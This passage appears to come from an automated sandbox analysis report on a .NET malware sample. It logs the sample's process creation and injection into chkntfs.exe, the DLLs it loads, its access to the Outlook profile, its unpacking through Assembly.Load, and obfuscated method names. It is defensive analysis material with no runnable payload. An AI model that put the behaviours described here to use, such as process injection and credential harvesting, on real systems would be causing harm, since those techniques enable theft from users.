              Source: C:\Windows\SysWOW64\chkntfs.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeProcess created: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe "C:\Users\user~1\AppData\Local\Temp\aj34fjqh.exe" Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeProcess created: C:\Users\user\AppData\Local\Temp\aj34fjqh.exe "C:\Users\user~1\AppData\Local\Temp\aj34fjqh.exe"Jump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: ulib.dllJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: ifsutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: devobj.dllJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: ieframe.dllJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: winsqlite3.dllJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Program Files (x86)\hPtrHAtiFIOlgWBhRKiQLCwHTCivTEHgUqCJwvwVbNzaVcNBivDXZtBimAlSz\xQUrWfQeELsQZII.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\aj34fjqh.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Windows\SysWOW64\chkntfs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
              Source: 8hd98EhtIFcYkb8.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: 8hd98EhtIFcYkb8.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: XOyN.pdb source: EuOdzX7Ehz6t1H3[1].exe.14.dr, aj34fjqh.exe.14.dr
              Source: Binary string: chkntfs.pdbGCTL source: 8hd98EhtIFcYkb8.exe, 00000003.00000002.1431730936.0000000000E17000.00000004.00000020.00020000.00000000.sdmp, xQUrWfQeELsQZII.exe, 0000000D.00000003.1370660862.000000000067B000.00000004.00000020.00020000.00000000.sdmp, xQUrWfQeELsQZII.exe, 0000000D.00000002.3701797109.0000000000668000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: xQUrWfQeELsQZII.exe, 0000000D.00000000.1357259966.000000000055E000.00000002.00000001.01000000.0000000D.sdmp, xQUrWfQeELsQZII.exe, 00000010.00000002.3691801922.000000000055E000.00000002.00000001.01000000.0000000D.sdmp
              Source: Binary string: wntdll.pdbUGP source: 8hd98EhtIFcYkb8.exe, 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 0000000E.00000003.1431710177.0000000004448000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 0000000E.00000002.3706103810.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 0000000E.00000002.3706103810.000000000493E000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 0000000E.00000003.1433783281.00000000045FA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: 8hd98EhtIFcYkb8.exe, 8hd98EhtIFcYkb8.exe, 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, chkntfs.exe, 0000000E.00000003.1431710177.0000000004448000.00000004.00000020.00020000.00000000.sdmp, chkntfs.exe, 0000000E.00000002.3706103810.00000000047A0000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 0000000E.00000002.3706103810.000000000493E000.00000040.00001000.00020000.00000000.sdmp, chkntfs.exe, 0000000E.00000003.1433783281.00000000045FA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: chkntfs.pdb source: 8hd98EhtIFcYkb8.exe, 00000003.00000002.1431730936.0000000000E17000.00000004.00000020.00020000.00000000.sdmp, xQUrWfQeELsQZII.exe, 0000000D.00000003.1370660862.000000000067B000.00000004.00000020.00020000.00000000.sdmp, xQUrWfQeELsQZII.exe, 0000000D.00000002.3701797109.0000000000668000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: XOyN.pdbSHA256 source: EuOdzX7Ehz6t1H3[1].exe.14.dr, aj34fjqh.exe.14.dr

              Data Obfuscation

              barindex
              .NET source code contains potential unpacker
              Source: 8hd98EhtIFcYkb8.exe, OptionsWindow.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
              Source: 0.2.8hd98EhtIFcYkb8.exe.72f0000.9.raw.unpack, YO0H0ElFyecC1S4kEO.cs.Net Code: gts9qQpZDK System.Reflection.Assembly.Load(byte[])
              Source: 0.2.8hd98EhtIFcYkb8.exe.3ab04b0.5.raw.unpack, YO0H0ElFyecC1S4kEO.cs.Net Code: gts9qQpZDK System.Reflection.Assembly.Load(byte[])
              Source: 0.2.8hd98EhtIFcYkb8.exe.3b342d0.6.raw.unpack, YO0H0ElFyecC1S4kEO.cs.Net Code: gts9qQpZDK System.Reflection.Assembly.Load(byte[])
              Source: 14.2.chkntfs.exe.4dccd08.2.raw.unpack, OptionsWindow.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
              Source: 16.0.xQUrWfQeELsQZII.exe.341cd08.1.raw.unpack, OptionsWindow.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
              Source: 16.2.xQUrWfQeELsQZII.exe.341cd08.1.raw.unpack, OptionsWindow.cs.Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
              Source: EuOdzX7Ehz6t1H3[1].exe.14.drStatic PE information: 0x82EF2085 [Thu Aug 11 21:05:09 2039 UTC]
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 0_2_00DBBE50 push ebp; retn 5504h0_2_00DBC03E
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 0_2_00DBB43B push ss; ret 0_2_00DBB442
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_00405059 pushad ; iretd 3_2_00405071
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0041688F pushad ; retf 3_2_004168B1
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_004231F3 push edx; ret 3_2_00423232
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_00401A04 push ecx; ret 3_2_00401A0E
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_00416213 push esi; iretd 3_2_0041621E
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0040D2B8 push edx; iretd 3_2_0040D2BA
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_00418B81 pushad ; iretd 3_2_00418BB3
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_00418B92 pushad ; iretd 3_2_00418BB3
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_00412435 push ds; iretd 3_2_00412439
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_00414436 push edi; iretd 3_2_00414437
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_00403570 push eax; ret 3_2_00403572
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0040CDC6 push es; retf 3_2_0040CDC7
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_00418EFD push ecx; retf 3_2_00418F05
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_004086BC push ss; retf 3_2_004086CA
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0041A72F push esi; iretd 3_2_0041A737
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0041A733 push esi; iretd 3_2_0041A737
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_00408787 push 0000004Fh; ret 3_2_004087AC
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0127225F pushad ; ret 3_2_012727F9
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012727FA pushad ; ret 3_2_012727F9
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_012A09AD push ecx; mov dword ptr [esp], ecx3_2_012A09B6
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_0127283D push eax; iretd 3_2_01272858
              Source: C:\Users\user\Desktop\8hd98EhtIFcYkb8.exeCode function: 3_2_01271368 push eax; iretd 3_2_01271369
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_047A27FA pushad ; ret 14_2_047A27F9
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_047A225F pushad ; ret 14_2_047A27F9
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_047A283D push eax; iretd 14_2_047A2858
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_047D09AD push ecx; mov dword ptr [esp], ecx14_2_047D09B6
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_005A2CA0 push esi; iretd 14_2_005A2CAB
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_005A0EC3 push edi; iretd 14_2_005A0EC4
              Source: C:\Windows\SysWOW64\chkntfs.exeCode function: 14_2_0059EEC2 push ds; iretd 14_2_0059EEC6
              Source: 8hd98EhtIFcYkb8.exeStatic PE information: section name: .text entropy: 7.968066969388496
              Source: EuOdzX7Ehz6t1H3[1].exe.14.drStatic PE information: section name: .text entropy: 7.917870067906471
              Source: aj34fjqh.exe.14.drStatic PE information: section name: .text entropy: 7.917870067906471
              Source: 0.2.8hd98EhtIFcYkb8.exe.72f0000.9.raw.unpack, oM1ONZzUFLWJVwrBmD.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'l8a5iVG0jC', 'Ypp5w0hSYu', 'BfJ5ZarlSI', 'jT65MBSGug', 'Eif5Qn0LMQ', 'tFR55tvRPs', 'HJm5InX1p7'
              Source: 0.2.8hd98EhtIFcYkb8.exe.72f0000.9.raw.unpack, gdM9Sh7KfRnAMumxqn.csHigh entropy of concatenated method names: 'sSMi1pLI71', 'fYSiOc6fub', 'bd0iTtYT6p', 'QR9i3ebDuL', 'Yktivvyc33', 'S6xineHxCQ', 'S2gid0gK8u', 'ueRi6OR8JL', 'UsiiauttIE', 'cQOiWyZ5ja'
              Source: 0.2.8hd98EhtIFcYkb8.exe.72f0000.9.raw.unpack, jQDDruxhUW3L8ewCVZ.csHigh entropy of concatenated method names: 'CBkkLfk7tw', 'CyCktpOby8', 'XgukcSRKdS', 'XofkeYkS0c', 'XSHkwODgIL', 'cflkZRmMqC', 'rMFRdgnPl3OqN2ybVI', 'XpHZ4UCqUu7hhT8K1s', 'PfFkkm37iB', 'r2xkGy6cJ9'
              Source: 0.2.8hd98EhtIFcYkb8.exe.72f0000.9.raw.unpack, lhJ65bFXQHOYZTcgeP.csHigh entropy of concatenated method names: 'ToString', 'N79ZWomGbk', 'x8UZ3LjLr1', 'sKHZsw8i6x', 'jqlZvR6Msv', 'FwSZntQ39f', 'tBtZXHq3EQ', 'jQMZdZ1ucS', 'H16Z6YSCi4', 'lrLZYVwTBb'
              Source: 0.2.8hd98EhtIFcYkb8.exe.72f0000.9.raw.unpack, G2EwvXm0pgP65nBy4N.csHigh entropy of concatenated method names: 'hrWLF0ToJi', 'eLBLKhNW5T', 'nDaLDZ0jYV', 'QrIDbRCQAE', 'W4tDztq0w0', 'CugLpHKKZr', 'lPcLk4foqQ', 'wJmL8NgLLW', 'CYHLGKSguj', 'DWFL90Y2iW'
              Source: 0.2.8hd98EhtIFcYkb8.exe.72f0000.9.raw.unpack, YO0H0ElFyecC1S4kEO.csHigh entropy of concatenated method names: 'Tn3G2DPEcv', 'JM1GFPB0WN', 'BgLGrdi7VU', 'GtQGKjYih4', 'yGjGHsx1Tk', 'J8NGDOgbbn', 'loPGLFPtEl', 'ymVGtNjNV9', 'CxRGRp2fju', 'CcFGcmtRi5'
              Source: 0.2.8hd98EhtIFcYkb8.exe.72f0000.9.raw.unpack, XlB6SnfKxWLPwwKgeG.csHigh entropy of concatenated method names: 'gZXQFa7yeL', 'jSpQrn36nI', 'jDfQK2kW5w', 'oKFQHvfEbs', 'dcnQDpwYVc', 'wvNQLy9IV2', 'fvgQtIXGKq', 'EXlQR9qvaY', 'FgcQcmSIpT', 'YcoQep6nBA'
              Source: 0.2.8hd98EhtIFcYkb8.exe.72f0000.9.raw.unpack, OrWCX5jtbYmS0dA9kT.csHigh entropy of concatenated method names: 'AWID2ka3UW', 'CdNDrBnXZV', 'cv6DH62672', 'cBZDLS4u2p', 'P6nDta9rly', 'eSpHmE7ynF', 'FX1HVSiMuy', 'zlqHuSpxEV', 'eg5HP1Hmrc', 'jmRHNZT1PQ'
              Source: 0.2.8hd98EhtIFcYkb8.exe.72f0000.9.raw.unpack, EcZcId4bZdkXGBs06MG.csHigh entropy of concatenated method names: 'OfQ57NDcOA', 'l0q5AFM4CV', 'qp65qRtygR', 'FlS5fJRjRH', 'kMi5Bf5tTE', 'bgD5hLULFO', 'TE45y03pAw', 'N4Y51ElEMZ', 'tUD5OHdLA8', 'WiP5oD8b0X'
              Source: 0.2.8hd98EhtIFcYkb8.exe.72f0000.9.raw.unpack, TBtgc3RMhuEWiOKVR4.csHigh entropy of concatenated method names: 'egswajbaVY', 'cI1wEpsEqf', 'qcZwJFrFUR', 'l1YwgmGbGs', 'Sodw34CUk5', 'bFCwsxrnQO', 'WF6wvUn4m1', 'vabwnQGZZg', 'GqLwXY8ZpD', 'ceDwdohG9Y'
              Source: 0.2.8hd98EhtIFcYkb8.exe.72f0000.9.raw.unpack, CewcDn534jkjemavqx.csHigh entropy of concatenated method names: 'J0JMP8YQfq', 'HEgMbUQjhV', 'y1nQpUJpyp', 'A4PQkS1uVG', 'LdwMWd7ICC', 'wNYMESTP6d', 'RyBMCGC67l', 'cgPMJKvxVT', 'loHMgDshgT', 'yg6M0EBnwL'
              Source: 0.2.8hd98EhtIFcYkb8.exe.72f0000.9.raw.unpack, G48YiXYv5ISrKQh5V0.csHigh entropy of concatenated method names: 'jJN5kaPtFu', 'UBM5GPIoC4', 'ODC59X6gti', 'TlI5FITjRb', 'uiE5rTvv02', 'sd75Hw6GaC', 'nVt5DHWvHh', 'n7kQuQ23NT', 'Jy3QPB6Xd9', 'uZ2QNGCgXA'
              Source: 0.2.8hd98EhtIFcYkb8.exe.72f0000.9.raw.unpack, TFHvvsv69ePy2X2akQ.csHigh entropy of concatenated method names: 'iJXL7lTqJ9', 'maILAdWG0a', 'IiXLq8WqvM', 'YbBLf77yHd', 'tkYLBX3Fif', 'gy3LhPP8QE', 'zVcLyJ9Yju', 'ubCL1soCsj', 'XYKLOkX7S1', 'cV6LoYePct'
              Source: 0.2.8hd98EhtIFcYkb8.exe.72f0000.9.raw.unpack, UDhf94o4ucAkwsm0sp.csHigh entropy of concatenated method names: 'f9Rq1yG0W', 'DJbff0drL', 'jEPhaTbqd', 'HujyEE1R5', 'BPrOP1NtM', 'morovODBF', 'UU6sQ30jGZyjNwuV8k', 'nEQFSL3NunNHbZ1dat', 'xSYQDvHlW', 'poTIxWtte'
              Source: 0.2.8hd98EhtIFcYkb8.exe.72f0000.9.raw.unpack, A297vOAUIe0qEnXTYd.csHigh entropy of concatenated method names: 'a9RrJNeYXU', 'K1Srg9mrKb', 'sf2r0xMadb', 'IQGrxa8AMT', 'pYyrmi7rBU', 'YvSrVfti0n', 'TrZrusOxQa', 'IAIrP1kaHt', 'hftrNMcGHt', 'wr9rbncfjd'
              Source: 0.2.8hd98EhtIFcYkb8.exe.72f0000.9.raw.unpack, EN7XnI15c37fuU7Hp5.csHigh entropy of concatenated method names: 'Y1hKfIOBtc', 'HjfKhcGKVf', 'LmoK1u0bTe', 'rngKOZldVQ', 'gbkKwfKbBL', 'rTHKZPaN6C', 'YRqKMiTl2T', 'CySKQT76gS', 'GoZK5G6d6Y', 'KWoKIRYuml'
              Source: 0.2.8hd98EhtIFcYkb8.exe.72f0000.9.raw.unpack, qLqlDin0qbgjcnfC3W.csHigh entropy of concatenated method names: 'TfsQTjjKJy', 'jrbQ3fEcoN', 'pZcQsKNQ2P', 'zt7QvEfapE', 'S9KQJNCHAY', 'A9QQnE9cdG', 'Next', 'Next', 'Next', 'NextBytes'
              Source: 0.2.8hd98EhtIFcYkb8.exe.72f0000.9.raw.unpack, xKGw5U4U0dqk7yQy8K9.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'YM7IJqfRhK', 'WQPIgbFdNh', 'wTRI0DQ9Jn', 'WgqIxEvbOn', 'D8PImwMxwd', 'BmGIVGAro0', 'FiBIueQYcf'
              Source: 0.2.8hd98EhtIFcYkb8.exe.72f0000.9.raw.unpack, Wn4fI4CGsHeONDg1CJ.csHigh entropy of concatenated method names: 'X4IMcGj8cE', 'lDVMeNSyeu', 'ToString', 'O3jMFF67iv', 'mI5MrppEig', 'mllMKytvtK', 'ktmMHB14FW', 'uwdMDWoxtY', 'YhsMLGn6OQ', 'pd7MtIZZld'
              Source: 0.2.8hd98EhtIFcYkb8.exe.72f0000.9.raw.unpack, n0j6khafNtyqP9fmV3.csHigh entropy of concatenated method names: 'Dispose', 'CK8kNrAsoW', 'u2r832ZQLk', 'LjPjjd69Fv', 'FRpkbSRatW', 'zSxkzCKGgd', 'ProcessDialogKey', 'ge08pewQR9', 'd8G8ksYKn8', 'HMo880mafZ'
              Source: 0.2.8hd98EhtIFcYkb8.exe.3ab04b0.5.raw.unpack, oM1ONZzUFLWJVwrBmD.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'l8a5iVG0jC', 'Ypp5w0hSYu', 'BfJ5ZarlSI', 'jT65MBSGug', 'Eif5Qn0LMQ', 'tFR55tvRPs', 'HJm5InX1p7'
              Source: 0.2.8hd98EhtIFcYkb8.exe.3ab04b0.5.raw.unpack, gdM9Sh7KfRnAMumxqn.csHigh entropy of concatenated method names: 'sSMi1pLI71', 'fYSiOc6fub', 'bd0iTtYT6p', 'QR9i3ebDuL', 'Yktivvyc33', 'S6xineHxCQ', 'S2gid0gK8u', 'ueRi6OR8JL', 'UsiiauttIE', 'cQOiWyZ5ja'
              Source: 0.2.8hd98EhtIFcYkb8.exe.3ab04b0.5.raw.unpack, jQDDruxhUW3L8ewCVZ.csHigh entropy of concatenated method names: 'CBkkLfk7tw', 'CyCktpOby8', 'XgukcSRKdS', 'XofkeYkS0c', 'XSHkwODgIL', 'cflkZRmMqC', 'rMFRdgnPl3OqN2ybVI', 'XpHZ4UCqUu7hhT8K1s', 'PfFkkm37iB', 'r2xkGy6cJ9'
              Source: 0.2.8hd98EhtIFcYkb8.exe.3ab04b0.5.raw.unpack, lhJ65bFXQHOYZTcgeP.csHigh entropy of concatenated method names: 'ToString', 'N79ZWomGbk', 'x8UZ3LjLr1', 'sKHZsw8i6x', 'jqlZvR6Msv', 'FwSZntQ39f', 'tBtZXHq3EQ', 'jQMZdZ1ucS', 'H16Z6YSCi4', 'lrLZYVwTBb'
              Source: 0.2.8hd98EhtIFcYkb8.exe.3ab04b0.5.raw.unpack, G2EwvXm0pgP65nBy4N.csHigh entropy of concatenated method names: 'hrWLF0ToJi', 'eLBLKhNW5T', 'nDaLDZ0jYV', 'QrIDbRCQAE', 'W4tDztq0w0', 'CugLpHKKZr', 'lPcLk4foqQ', 'wJmL8NgLLW', 'CYHLGKSguj', 'DWFL90Y2iW'
